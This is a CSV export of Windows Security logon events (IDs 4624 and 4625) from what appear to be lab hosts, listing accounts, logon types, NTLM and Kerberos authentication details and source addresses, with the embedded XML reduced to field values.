+2019-03-19T04:02:04.241919+04:00,1552953724.241919,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566830 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2c0 + 3 + NtLmSsp + NTLM + + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 10.0.2.17 + 49237 + %%1833 + +" +2019-03-19T04:02:04.226251+04:00,1552953724.226251,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566826 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2aa + 3 + NtLmSsp + NTLM + + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 10.0.2.17 + 49236 + %%1833 + +" +2019-03-19T04:02:04.210688+04:00,1552953724.210688,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,NULL,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 
0x8020000000000000 + + + 566823 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x17e29a + 3 + NtLmSsp + NTLM + NULL + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 10.0.2.17 + 49236 + %%1833 + +" +2019-02-13T19:31:46.648513+04:00,1550071906.648513,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,PC01,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5323 + + + + + Security + PC02.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x7d4f4 + 3 + NtLmSsp + NTLM + PC01 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 10.0.2.17 + 49169 + +" +2019-02-13T19:31:46.648513+04:00,1550071906.648513,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,PC01,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5322 + + + + + Security + PC02.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x73d02 + 3 + NtLmSsp + NTLM + PC01 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 10.0.2.17 + 49168 + +" +2019-02-13T19:29:41.418441+04:00,1550071781.418441,4624,IEUser,PC02,2,User32,127.0.0.1,PC02,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5319 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC02 + 0x4a26d + 2 + User32 + Negotiate + PC02 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x994 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 0 + +" +2019-02-13T19:27:53.653483+04:00,1550071673.653483,4624,IEUser,PC02,10,User32,127.0.0.1,PC02,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5315 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + 
S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC02 + 0x45120 + 10 + User32 + Negotiate + PC02 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x658 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 49164 + +" +2019-02-13T19:25:17.799376+04:00,1550071517.799376,4624,IEUser,PC02,2,User32,127.0.0.1,PC02,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5308 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC02 + 0x21f73 + 2 + User32 + Negotiate + PC02 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x198 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 0 + +" +2019-02-13T19:19:51.259835+04:00,1550071191.259835,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5305 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:17:38.779337+04:00,1550071058.779337,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5303 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:17:38.018243+04:00,1550071058.018243,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5302 + + + + + Security + PC02.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x113f5 + 3 + NtLmSsp + NTLM + + 00000000-0000-0000-0000-000000000000 + - + 
NTLM V1 + 0 + 0x0 + - + - + - + +" +2019-02-13T19:15:08.821952+04:00,1550070908.821952,4624,sshd_server,PC02,5,Advapi,-,PC02,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5299 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-21-3583694148-1414552638-2922671848-1002 + sshd_server + PC02 + 0xe509 + 5 + Advapi + Negotiate + PC02 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:08.689762+04:00,1550070908.689762,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5296 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:07.852561+04:00,1550070907.852561,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5293 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:07.422945+04:00,1550070907.422945,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5291 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:05.924796+04:00,1550070905.924796,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 
0 + 12544 + 0 + 0x8020000000000000 + + + 5289 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:05.660417+04:00,1550070905.660417,4624,LOCAL SERVICE,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5287 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:05.065564+04:00,1550070905.065564,4624,NETWORK SERVICE,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5285 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-20 + NETWORK SERVICE + NT AUTHORITY + 0x3e4 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:04.911343+04:00,1550070904.911343,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5283 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:04.635947+04:00,1550070904.635947,4624,SYSTEM,NT AUTHORITY,0,-,-,-,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5281 + + + + + Security + PC02.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 0 + - + - + - + 
00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x4 + + - + - + +" +2019-02-13T19:15:04.135227+04:00,1550070904.135227,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5278 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d4 + C:\Windows\System32\services.exe + - + - + +" +2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 72742 + + + + + Security + 02694w-win10.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + THREEBEESCO.COM + 0x8a38de + 3 + Kerberos + Kerberos + - + 35D5E180-95BD-9ED7-7EFE-C355D7215A87 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50163 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-03-19T03:23:57.397648+04:00,1552951437.397648,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 565611 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x15e25f + 3 + Kerberos + Kerberos + + 1054A084-EFFD-F992-9C74-63873C88272E + - + - + 0 + 0x0 + - + fe80::79bf:8ee2:433c:2567 + 55873 + %%1840 + +" +2019-03-19T03:23:52.507387+04:00,1552951432.507387,4624,user01,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 565599 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x15e1a7 + 3 + Kerberos + Kerberos + + 14CCCD18-A781-AC28-C773-EA57D49F4B90 
+ - + - + 0 + 0x0 + - + 10.0.2.17 + 49222 + %%1840 + +" +2019-03-19T03:23:51.772355+04:00,1552951431.772355,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 565596 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x15e162 + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + fe80::79bf:8ee2:433c:2567 + 55872 + %%1840 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 565653 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x16792b + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + ::1 + 55878 + %%1833 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,3,Advapi,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 161473 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1009 + svc01 + MSEDGEWIN10 + 0x10b6b3 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x22afa1 + 3 + Advapi + MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x140c + C:\Windows\System32\inetsrv\w3wp.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-05-11T21:10:10.889320+04:00,1557594610.88932,4624,IEUser,IEWIN7,9,seclogo,::1,,IEWIN7,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 18206 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1371b + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1bbdce + 9 + seclogo + 
Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x3c8 + C:\Windows\System32\svchost.exe + ::1 + 0 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + 
S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + 
+ + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program 
Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + 
NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772611 + + 
